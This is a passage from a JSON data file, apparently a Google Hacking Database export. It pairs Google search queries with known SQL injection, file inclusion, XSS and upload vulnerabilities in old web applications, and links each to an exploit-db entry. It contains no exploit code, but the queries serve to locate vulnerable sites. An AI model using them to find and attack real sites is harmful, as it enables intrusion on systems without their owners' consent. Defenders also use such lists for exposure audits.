"http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_ckforms%22", "shortDescription": "inurl:\"com_ckforms\"", "textualDescription": "Joomla Component com_ckforms Multiple Vulnerabilities - CVE: 2010-1344: http://www.exploit-db.com/exploits/11785" }, { "signatureReferenceNumber": "2040", "link": "https://www.exploit-db.com/ghdb/2040/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:%22index.php%3Fsite%3D%22+%22W-Agora%22", "shortDescription": "allinurl:\"index.php?site=\" \"W-Agora\"", "textualDescription": "w-Agora 4.2.1 (cat) Remote SQL Injection Vulnerability - CVE: 2007-6647: http://www.exploit-db.com/exploits/4817" }, { "signatureReferenceNumber": "2041", "link": "https://www.exploit-db.com/ghdb/2041/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:categoria.php%3FID%3D+comune", "shortDescription": "inurl:categoria.php?ID= comune", "textualDescription": "Prometeo v1.0.65 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14806" }, { "signatureReferenceNumber": "2043", "link": "https://www.exploit-db.com/ghdb/2043/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Fm_id%3D%22", "shortDescription": "inurl:\"index.php?m_id=\"", "textualDescription": "slogan design Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12849" }, { "signatureReferenceNumber": "2044", "link": "https://www.exploit-db.com/ghdb/2044/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+MVC-Web+CMS++inurl:/index.asp%3Fnewsid%3D", "shortDescription": "Powered by MVC-Web CMS inurl:/index.asp?newsid=", "textualDescription": "MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5912" }, { "signatureReferenceNumber": "2045", "link": "https://www.exploit-db.com/ghdb/2045/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+%22showCat.php%3Fcat_id%22", "shortDescription": "allinurl: \"showCat.php?cat_id\"", "textualDescription": "D.E. Classifieds (cat_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5291" }, { "signatureReferenceNumber": "2046", "link": "https://www.exploit-db.com/ghdb/2046/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Web+site+engine's+code+is+copyright+%C3%82%C2%A9+2001-2007+ATutor%C3%82%C2%AE%22", "shortDescription": "\"Web site engine's code is copyright \u00c2\u00a9 2001-2007 ATutor\u00c2\u00ae\"", "textualDescription": "ATutor 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability - CVE: 2008-3368: http://www.exploit-db.com/exploits/6153" }, { "signatureReferenceNumber": "2047", "link": "https://www.exploit-db.com/ghdb/2047/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PhpLinkExchange+v1.02%22", "shortDescription": "\"PhpLinkExchange v1.02\"", "textualDescription": "PhpLinkExchange v1.02 - XSS/Upload Vulerability - CVE: 2008-3679: http://www.exploit-db.com/exploits/10495" }, { "signatureReferenceNumber": "2048", "link": "https://www.exploit-db.com/ghdb/2048/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22ClanSys+v.1.1%22", "shortDescription": "\"ClanSys v.1.1\"", "textualDescription": "Clansys v.1.1 (index.php page) PHP Code Insertion Vulnerability - CVE: 2006-2005: http://www.exploit-db.com/exploits/1710" }, { "signatureReferenceNumber": "2049", "link": "https://www.exploit-db.com/ghdb/2049/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_accountlistmanager.asp", "shortDescription": "inurl:inc_accountlistmanager.asp", "textualDescription": "DMXReady Account List Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7754" }, { "signatureReferenceNumber": "2050", "link": "https://www.exploit-db.com/ghdb/2050/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jomestate", "shortDescription": "inurl:com_jomestate", "textualDescription": "Joomla Hot Property com_jomestate RFI Vulnerability: http://www.exploit-db.com/exploits/13956" }, { "signatureReferenceNumber": "2051", "link": "https://www.exploit-db.com/ghdb/2051/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Cr%C3%83%C2%A9%C3%83%C2%A9+par+Narfight,+ClanLite+V2.2006.05.20+%C3%82%C2%A9+2000-2005", "shortDescription": "Cr\u00c3\u00a9\u00c3\u00a9 par Narfight, ClanLite V2.2006.05.20 \u00c2\u00a9 2000-2005", "textualDescription": "ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5215: http://www.exploit-db.com/exploits/5595" }, { "signatureReferenceNumber": "2052", "link": "https://www.exploit-db.com/ghdb/2052/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Members+Statistics%22+%2B%22Total+Members%22+%2B%22Guests+Online%22", "shortDescription": "\"Members Statistics\" +\"Total Members\" +\"Guests Online\"", "textualDescription": "AR Memberscript (usercp_menu.php) Remote File Include Vulnerability - CVE: 2006-6590: http://www.exploit-db.com/exploits/2931" }, { "signatureReferenceNumber": "2053", "link": "https://www.exploit-db.com/ghdb/2053/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Copyright+Interactivefx.ie%22", "shortDescription": "\"Copyright Interactivefx.ie\"", "textualDescription": "Interactivefx.ie CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11873" }, { "signatureReferenceNumber": "2054", "link": "https://www.exploit-db.com/ghdb/2054/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Atomic+Photo+Album%22+inurl:%22photo.php%3Fapa_album_ID%3D%22", "shortDescription": "\"Powered by Atomic Photo Album\" inurl:\"photo.php?apa_album_ID=\"", "textualDescription": "Atomic Photo Album 1.0.2 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/14801" }, { "signatureReferenceNumber": "2055", "link": "https://www.exploit-db.com/ghdb/2055/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:tr.php%3Fid%3D+Hosting", "shortDescription": "inurl:tr.php?id= Hosting", "textualDescription": "YourFreeWorld Classifieds Hosting (id) SQL Injection Vulnerability - CVE: 2008-4884: http://www.exploit-db.com/exploits/6948" }, { "signatureReferenceNumber": "2056", "link": "https://www.exploit-db.com/ghdb/2056/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinur:com_extended_registration", "shortDescription": "allinur:com_extended_registration", "textualDescription": "Mambo com_registration_detailed 4.1 Remote File Include - CVE: 2006-5254: http://www.exploit-db.com/exploits/2379" }, { "signatureReferenceNumber": "2057", "link": "https://www.exploit-db.com/ghdb/2057/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22100%25+|+50%25+|+25%25%22+%22Back+to+gallery%22+inurl:%22show.php%3Fimageid%3D%22", "shortDescription": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "textualDescription": "Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability - CVE: 2008-4167: http://www.exploit-db.com/exploits/6437" }, { "signatureReferenceNumber": "2058", "link": "https://www.exploit-db.com/ghdb/2058/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_rapidrecipe+%22recipe_id%22", "shortDescription": "inurl:com_rapidrecipe \"recipe_id\"", "textualDescription": "Joomla Component rapidrecipe Remote SQL injection Vulnerability - CVE: 2008-2697: http://www.exploit-db.com/exploits/5759" }, { "signatureReferenceNumber": "2059", "link": "https://www.exploit-db.com/ghdb/2059/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+SoftbizScripts%22+%22OUR+SPONSORS%22", "shortDescription": "\"Powered by SoftbizScripts\" \"OUR SPONSORS\"", "textualDescription": "Softbiz Link Directory Script Remote SQL Injection Vulnerability - CVE: 2007-5996: http://www.exploit-db.com/exploits/4620" }, { "signatureReferenceNumber": "2060", "link": "https://www.exploit-db.com/ghdb/2060/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+PowerPortal+v1.3a", "shortDescription": "Powered by PowerPortal v1.3a", "textualDescription": "PowerPortal 1.3a (index.php) Remote File Include Vulnerability - CVE: 2006-5126: http://www.exploit-db.com/exploits/2454" }, { "signatureReferenceNumber": "2061", "link": "https://www.exploit-db.com/ghdb/2061/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+DUdforum+3.0+++++inurl:/forums.asp%3FiFor%3D", "shortDescription": "Powered by DUdforum 3.0 inurl:/forums.asp?iFor=", "textualDescription": "DUdForum 3.0 (forum.asp iFor) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5894" }, { "signatureReferenceNumber": "2062", "link": "https://www.exploit-db.com/ghdb/2062/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+kure%22", "shortDescription": "\"powered by kure\"", "textualDescription": "Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability - CVE: 2008-4632: http://www.exploit-db.com/exploits/6767" }, { "signatureReferenceNumber": "2065", "link": "https://www.exploit-db.com/ghdb/2065/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Liberum+Help+Desk,+Copyright+(C)+2001+Doug+Luxem%22", "shortDescription": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem\"", "textualDescription": "Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities - CVE: 2008-6057: http://www.exploit-db.com/exploits/7493" }, { "signatureReferenceNumber": "2066", "link": "https://www.exploit-db.com/ghdb/2066/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:modules.php%3Fname%3DShopping_Cart", "shortDescription": "inurl:modules.php?name=Shopping_Cart", "textualDescription": "PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability - CVE: 2007-1034: http://www.exploit-db.com/exploits/10615" }, { "signatureReferenceNumber": "2067", "link": "https://www.exploit-db.com/ghdb/2067/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+galid+%22index.php%3Fp%3Dgallerypic%22", "shortDescription": "allinurl: galid \"index.php?p=gallerypic\"", "textualDescription": "Koobi Pro 6.25 gallery Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5413" }, { "signatureReferenceNumber": "2068", "link": "https://www.exploit-db.com/ghdb/2068/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:\"powered+by+itaco+group\"", "shortDescription": "intext:\"powered by itaco group\"", "textualDescription": "ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11012" }, { "signatureReferenceNumber": "2069", "link": "https://www.exploit-db.com/ghdb/2069/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+yappa-ng+2.3.1%22+AND+%22Powered+by+yappa-ng+2.3.1%22", "shortDescription": "\"Powered by yappa-ng 2.3.1\" AND \"Powered by yappa-ng 2.3.1\"", "textualDescription": "yappa-ng 2.3.1 (admin_modules) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2292" }, { "signatureReferenceNumber": "2070", "link": "https://www.exploit-db.com/ghdb/2070/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=mediaHolder.php%3Fid", "shortDescription": "mediaHolder.php?id", "textualDescription": "WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln: http://www.exploit-db.com/exploits/6842" }, { "signatureReferenceNumber": "2071", "link": "https://www.exploit-db.com/ghdb/2071/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22ActualAnalyzer+Lite+(free)+2.78%22%2B%22Copyright+%C3%82%C2%A9+2006+ActualScripts%22", "shortDescription": "\"ActualAnalyzer Lite (free) 2.78\"+\"Copyright \u00c2\u00a9 2006 ActualScripts\"", "textualDescription": "ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability - CVE: 2008-2076: http://www.exploit-db.com/exploits/5528" }, { "signatureReferenceNumber": "2072", "link": "https://www.exploit-db.com/ghdb/2072/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+seditio%22+OR+%22powered+by+ldu%22", "shortDescription": "\"powered by seditio\" OR \"powered by ldu\"", "textualDescription": "Seditio CMS v121 (pfs.php) Remote File Upload Vulnerability - CVE: 2007-4057: http://www.exploit-db.com/exploits/4235" }, { "signatureReferenceNumber": "2073", "link": "https://www.exploit-db.com/ghdb/2073/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_forum", "shortDescription": "inurl:com_forum", "textualDescription": "com_forum Mambo Component" }, { "signatureReferenceNumber": "2074", "link": "https://www.exploit-db.com/ghdb/2074/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By+AJ+Auction", "shortDescription": "Powered By AJ Auction", "textualDescription": "AJ Auction v1 (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5868" }, { "signatureReferenceNumber": "2075", "link": "https://www.exploit-db.com/ghdb/2075/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Content+Injector+v1.52%22", "shortDescription": "\"Powered by Content Injector v1.52\"", "textualDescription": "Content Injector 1.52 (index.php cat) Remote SQL Injection Vulnerability - CVE: 2007-6137: http://www.exploit-db.com/exploits/4645" }, { "signatureReferenceNumber": "2077", "link": "https://www.exploit-db.com/ghdb/2077/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Events+Calendar+1.1", "shortDescription": "Events Calendar 1.1", "textualDescription": "Events Calendar 1.1 Remote File Inclusion Vulnerability - CVE: 2008-4673: http://www.exploit-db.com/exploits/6623" }, { "signatureReferenceNumber": "2078", "link": "https://www.exploit-db.com/ghdb/2078/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Copyright+(c)+2004-2006+by+Simple+PHP+Guestbook%22", "shortDescription": "\"Copyright (c) 2004-2006 by Simple PHP Guestbook\"", "textualDescription": "Simple PHP Guestbook Remote Admin Access: http://www.exploit-db.com/exploits/10666" }, { "signatureReferenceNumber": "2079", "link": "https://www.exploit-db.com/ghdb/2079/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_linksmanager.asp", "shortDescription": "inurl:inc_linksmanager.asp", "textualDescription": "DMXReady Links Manager 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7772" }, { "signatureReferenceNumber": "2080", "link": "https://www.exploit-db.com/ghdb/2080/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/index.php%3Foption%3Dcom_otzivi", "shortDescription": "inurl:/index.php?option=com_otzivi", "textualDescription": "Joomla Component com_otzivi Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10966" }, { "signatureReferenceNumber": "2082", "link": "https://www.exploit-db.com/ghdb/2082/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+DigitalHive%22", "shortDescription": "\"Powered by DigitalHive\"", "textualDescription": "DigitalHive 2.0 RC2 (base_include.php) Remote Include Vulnerability - CVE: 2006-5493: http://www.exploit-db.com/exploits/2566" }, { "signatureReferenceNumber": "2083", "link": "https://www.exploit-db.com/ghdb/2083/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_casino_blackjack%22", "shortDescription": "inurl:\"com_casino_blackjack\"", "textualDescription": "Joomla Casino 0.3.1 Multiple SQL Injection - CVE: 2009-2239: http://www.exploit-db.com/exploits/8743" }, { "signatureReferenceNumber": "2084", "link": "https://www.exploit-db.com/ghdb/2084/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/tagit2b/%22", "shortDescription": "inurl:\"/tagit2b/\"", "textualDescription": "TagIt! Tagboard 2.1.b b2 (index.php) Remote File Include Vulnerability - CVE: 2006-5093: http://www.exploit-db.com/exploits/2450" }, { "signatureReferenceNumber": "2085", "link": "https://www.exploit-db.com/ghdb/2085/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+LionWiki+%22", "shortDescription": "\"powered by LionWiki \"", "textualDescription": "LionWiki 3.X (index.php) Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12075" }, { "signatureReferenceNumber": "2086", "link": "https://www.exploit-db.com/ghdb/2086/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+%22index.php%3Farea%22galid", "shortDescription": "allinurl: \"index.php?area\"galid", "textualDescription": "Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5414" }, { "signatureReferenceNumber": "2087", "link": "https://www.exploit-db.com/ghdb/2087/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22tr1.php%3Fid%3D%22", "shortDescription": "inurl:\"tr1.php?id=\"", "textualDescription": "YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability - CVE: 2008-4885: http://www.exploit-db.com/exploits/6942" }, { "signatureReferenceNumber": "2088", "link": "https://www.exploit-db.com/ghdb/2088/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Designed+by+Spaceacre%22", "shortDescription": "\"Designed by Spaceacre\"", "textualDescription": "Spaceacre Multiple SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12551" }, { "signatureReferenceNumber": "2089", "link": "https://www.exploit-db.com/ghdb/2089/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Shadowed+Portal", "shortDescription": "Powered by Shadowed Portal", "textualDescription": "Shadowed Portal 5.7d3 (POST) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4769" }, { "signatureReferenceNumber": "2090", "link": "https://www.exploit-db.com/ghdb/2090/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by:+PhotoPost+PHP+4.6.5%22", "shortDescription": "\"Powered by: PhotoPost PHP 4.6.5\"", "textualDescription": "PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability - CVE: 2004-0239: http://www.exploit-db.com/exploits/14453" }, { "signatureReferenceNumber": "2091", "link": "https://www.exploit-db.com/ghdb/2091/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_otzivi%22", "shortDescription": "inurl:\"com_otzivi\"", "textualDescription": "Joomla Component com_otzivi Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/11494" }, { "signatureReferenceNumber": "2092", "link": "https://www.exploit-db.com/ghdb/2092/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22browse.php%3Ffolder%3D%22+Powered+by+GeneShop+5", "shortDescription": "inurl:\"browse.php?folder=\" Powered by GeneShop 5", "textualDescription": "GeneShop 5.1.1 SQL Injection Vunerability: http://www.exploit-db.com/exploits/12442" }, { "signatureReferenceNumber": "2093", "link": "https://www.exploit-db.com/ghdb/2093/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+PsNews%22", "shortDescription": "\"Powered by PsNews\"", "textualDescription": "PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability - CVE: 2007-3772: http://www.exploit-db.com/exploits/4174" }, { "signatureReferenceNumber": "2094", "link": "https://www.exploit-db.com/ghdb/2094/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_faqsmanager.asp", "shortDescription": "inurl:inc_faqsmanager.asp", "textualDescription": "DMXReady Faqs Manager 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7770" }, { "signatureReferenceNumber": "2095", "link": "https://www.exploit-db.com/ghdb/2095/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+sX-Shop%22", "shortDescription": "\"powered by sX-Shop\"", "textualDescription": "sX-Shop Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/14558" }, { "signatureReferenceNumber": "2096", "link": "https://www.exploit-db.com/ghdb/2096/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:'Powered+by+ProArcadeScript+'+inurl:'game.php%3Fid%3D'", "shortDescription": "intext:'Powered by ProArcadeScript ' inurl:'game.php?id='", "textualDescription": "ProArcadeScript to Game (game) SQL Injection Vulnerability - CVE: 2010-1069: http://www.exploit-db.com/exploits/11080" }, { "signatureReferenceNumber": "2097", "link": "https://www.exploit-db.com/ghdb/2097/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:tr.php%3Fid%3D+Downline", "shortDescription": "inurl:tr.php?id= Downline", "textualDescription": "YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability - CVE: 2008-4895: http://www.exploit-db.com/exploits/6935" }, { "signatureReferenceNumber": "2098", "link": "https://www.exploit-db.com/ghdb/2098/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:tr.php%3Fid%3D+Autoresponder", "shortDescription": "inurl:tr.php?id= Autoresponder", "textualDescription": "YourFreeWorld Autoresponder Hosting (id) SQL Injection Vulnerability - CVE: 2008-4882: http://www.exploit-db.com/exploits/6938" }, { "signatureReferenceNumber": "2099", "link": "https://www.exploit-db.com/ghdb/2099/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/index.php%3Fm%3D%22+%22PHPRecipeBook+2.39%22", "shortDescription": "inurl:\"/index.php?m=\" \"PHPRecipeBook 2.39\"", "textualDescription": "PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability - CVE: 2009-4883: http://www.exploit-db.com/exploits/8330" }, { "signatureReferenceNumber": "2100", "link": "https://www.exploit-db.com/ghdb/2100/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+webClassifieds%22", "shortDescription": "\"powered by webClassifieds\"", "textualDescription": "webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5817: http://www.exploit-db.com/exploits/7602" }, { "signatureReferenceNumber": "2101", "link": "https://www.exploit-db.com/ghdb/2101/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/modules/Partenaires/clic.php%3Fid%3D", "shortDescription": "inurl:/modules/Partenaires/clic.php?id=", "textualDescription": "Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection: http://www.exploit-db.com/exploits/14556" }, { "signatureReferenceNumber": "2102", "link": "https://www.exploit-db.com/ghdb/2102/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+SoftbizScripts%22+%22ALL+JOBS%22", "shortDescription": "\"Powered by SoftbizScripts\" \"ALL JOBS\"", "textualDescription": "Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability - CVE: 2007-5316: http://www.exploit-db.com/exploits/4504" }, { "signatureReferenceNumber": "2103", "link": "https://www.exploit-db.com/ghdb/2103/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_jabode", "shortDescription": "inurl:com_jabode", "textualDescription": "Joomla Component jabode (id) Remote SQL Injection Vulnerability - CVE: 2008-7169: http://www.exploit-db.com/exploits/5963" }, { "signatureReferenceNumber": "2104", "link": "https://www.exploit-db.com/ghdb/2104/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+DBHcms%22", "shortDescription": "\"powered by DBHcms\"", "textualDescription": "DBHcms 1.1.4 Stored XSS: http://www.exploit-db.com/exploits/12499" }, { "signatureReferenceNumber": "2105", "link": "https://www.exploit-db.com/ghdb/2105/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22nabopoll/%22", "shortDescription": "inurl:\"nabopoll/\"", "textualDescription": "nabopoll 1.2 Remote Unprotected Admin Section Vulnerability - CVE: 2007-0873: http://www.exploit-db.com/exploits/3305" }, { "signatureReferenceNumber": "2108", "link": "https://www.exploit-db.com/ghdb/2108/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22sitio+web+dise%C3%B1ado+por+www.toronja.com.pe%22", "shortDescription": "intext:\"sitio web dise\u00f1ado por www.toronja.com.pe\"", "textualDescription": "Toronja Cms HTML/XSS Injection Vulnerability: http://www.exploit-db.com/exploits/12771" }, { "signatureReferenceNumber": "2109", "link": "https://www.exploit-db.com/ghdb/2109/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+CMScout+%C3%82%C2%A92005+CMScout+Group%22", "shortDescription": "\"Powered by CMScout \u00c2\u00a92005 CMScout Group\"", "textualDescription": "CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability - CVE: 2008-3415: http://www.exploit-db.com/exploits/6142" }, { "signatureReferenceNumber": "2111", "link": "https://www.exploit-db.com/ghdb/2111/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:test.php+Powered+by+TalkBack", "shortDescription": "inurl:test.php Powered by TalkBack", "textualDescription": "TalkBack 2.3.14 Multiple Remote Vulnerabilities - CVE: 2009-4854: http://www.exploit-db.com/exploits/9095" }, { "signatureReferenceNumber": "2112", "link": "https://www.exploit-db.com/ghdb/2112/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Maian+Gallery+v2.0+Copyright+%C3%82%C2%A9+2006-2008+Maian+Script+World.+All+Rights+Reserved.", "shortDescription": "Maian Gallery v2.0 Copyright \u00c2\u00a9 2006-2008 Maian Script World. All Rights Reserved.", "textualDescription": "Maian Gallery 2.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6049" }, { "signatureReferenceNumber": "2114", "link": "https://www.exploit-db.com/ghdb/2114/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Ovidentia%22", "shortDescription": "\"Powered by Ovidentia\"", "textualDescription": "Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability - CVE: 2008-3918: http://www.exploit-db.com/exploits/6232" }, { "signatureReferenceNumber": "2115", "link": "https://www.exploit-db.com/ghdb/2115/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=team5+studio+all+rights+reserved+site:cn", "shortDescription": "team5 studio all rights reserved site:cn", "textualDescription": "Team 1.x (DD/XSS) Multiple Remote Vulnerabilities - CVE: 2009-0760: http://www.exploit-db.com/exploits/7982" }, { "signatureReferenceNumber": "2116", "link": "https://www.exploit-db.com/ghdb/2116/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allintext:%22+If+you+would+like+to+contact+us,+our+email+address+is%22+traffic", "shortDescription": "allintext:\" If you would like to contact us, our email address is\" traffic", "textualDescription": "Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility - CVE: 2007-3840: http://www.exploit-db.com/exploits/4187" }, { "signatureReferenceNumber": "2117", "link": "https://www.exploit-db.com/ghdb/2117/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+phpGreetCards%22", "shortDescription": "\"powered by phpGreetCards\"", "textualDescription": "phpGreetCards XSS/Arbitrary File Upload Vulnerability - CVE: 2008-6848: http://www.exploit-db.com/exploits/7561" }, { "signatureReferenceNumber": "2118", "link": 